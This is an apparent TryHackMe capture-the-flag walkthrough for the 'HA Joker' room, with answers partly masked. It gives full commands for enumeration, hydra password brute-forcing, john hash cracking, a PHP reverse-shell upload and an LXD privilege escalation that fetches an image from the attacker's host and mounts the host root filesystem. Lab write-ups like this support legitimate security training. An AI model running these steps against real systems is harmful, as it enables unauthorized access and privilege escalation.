TryHackMe: HA Joker CTF

## Enumerate services on target machine.

Command: mkdir nmap

Command: nmap -sS -sC -sV -oN nmap/initial 10.10.6.123

Nmap command and Apache version

## What version of Apache is it?

Answer: See the picture above.

## What port on this machine not need to be authenticated by user and password?

## There is a file on this port that seems to be secret, what is it?

Command: gobuster dir -u http://10.10.6.123/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html

Answer: s*********

## There is another file which reveals information of the backend, what is it?

Command: gobuster dir -u http://10.10.6.123/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt

Answer: p**********

## When reading the secret file, We find with a conversation that seems contains at least two users and some keywords that can be intersting, what user do you think it is?

Answer: J****

## What port on this machine need to be authenticated by Basic Authentication Mechanism?

Answer: 8****

## At this point we have one user and a url that needs to be aunthenticated, brute force it to get the password, what is that password?

Command: hydra -l j**** -P /usr/share/wordlists/rockyou.txt -s 8080 10.10.247.37 http-get / -V

Answer: h*****

## Yeah!! We got the user and password and we see a cms based blog. Now check for directories and files in this port. What directory looks like as admin directory?

Command: gobuster dir -u http://10.10.6.123:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -U j**** -P h*****

Answer: /a************

## We need access to the administration of the site in order to get a shell, there is a backup file, What is this file?

Answer: b*****.***

## We have the backup file and now we should look for some information, for example database, configuration files, etc … But the backup file seems to be encrypted. What is the password?

Command: zip2john backup > hash.txt

Command: john hash.txt — wordlist=/usr/share/wordlists/rockyou.txt

Answer: h*****

## Remember that… We need access to the administration of the site… Blah blah blah. In our new discovery we see some files that have compromising information, maybe db? ok what if we do a restoration of the database! Some tables must have something like user_table! What is the super duper user?

Command: unzip backup

Command: cd db/

Command: cat joomladb.sql

Answer: a****

## Super Duper User! What is the password?

Command: nano admin.txt

Command: john admin.txt — wordlist=/usr/share/wordlists/rockyou.txt

Answer: a*******

## At this point, you should be upload a reverse-shell in order to gain shell access. What is the owner of this session?

Getting a shell

Reverse shell on any CMS | VK9 Security

You can get the reverse shell from this page.

php-reverse-shell/php-reverse-shell.php at master · pentestmonkey/php-reverse-shell

Answer: w*******

## This user belongs to a group that differs on your own group, What is this group?

Answer: L**

## Spawn a tty shell.

Command: script /dev/null -c bash

## In this question you should be do a basic research on how linux containers (LXD) work, it has a small online tutorial. Googling “lxd try it online”.

## Research how to escalate privileges using LXD permissions and check to see if there are any images available on the box.

I: Research

Lxd Privilege Escalation - Hacking Articles

II: In our own terminal

Command: git clone https://github.com/saghul/lxd-alpine-builder.git

Command: cd lxd-alpine-builder

Command: sudo ./build-alpine

Command: python3 -m http.server 80

III: İn Target terminal

Command: cd /tmp

Command: wget http://your_ip/alpine-v3.15-x86_64-20220313_1211.tar.gz

Command: lxc image import ./alpine-v3.15-x86_64-20220313_1211.tar.gz --alias myimage

Command: lxc init myimage ignite -c security.privileged=true

## The idea here is to mount the root of the OS file system on the container, this should give us access to the root directory. Create the container with the privilege true and mount the root file system on /mnt in order to gain access to /root directory on host machine.

Command: lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

Command: lxc start ignite

Command: lxc exec ignite /bin/sh

## What is the name of the file in the /root directory?

Command: cd /

Command: cd mnt

Command: cd root

Command: cd root

Command: ls

Answer: f********

Note: “My purpose in coloring the credentials and marking them with a star is for you to work on yourself and understand the essence. Of course you can find the answers elsewhere. But it will not help you.
If you have any suggestions or comments, please let me know. Thanks. Have a good days.”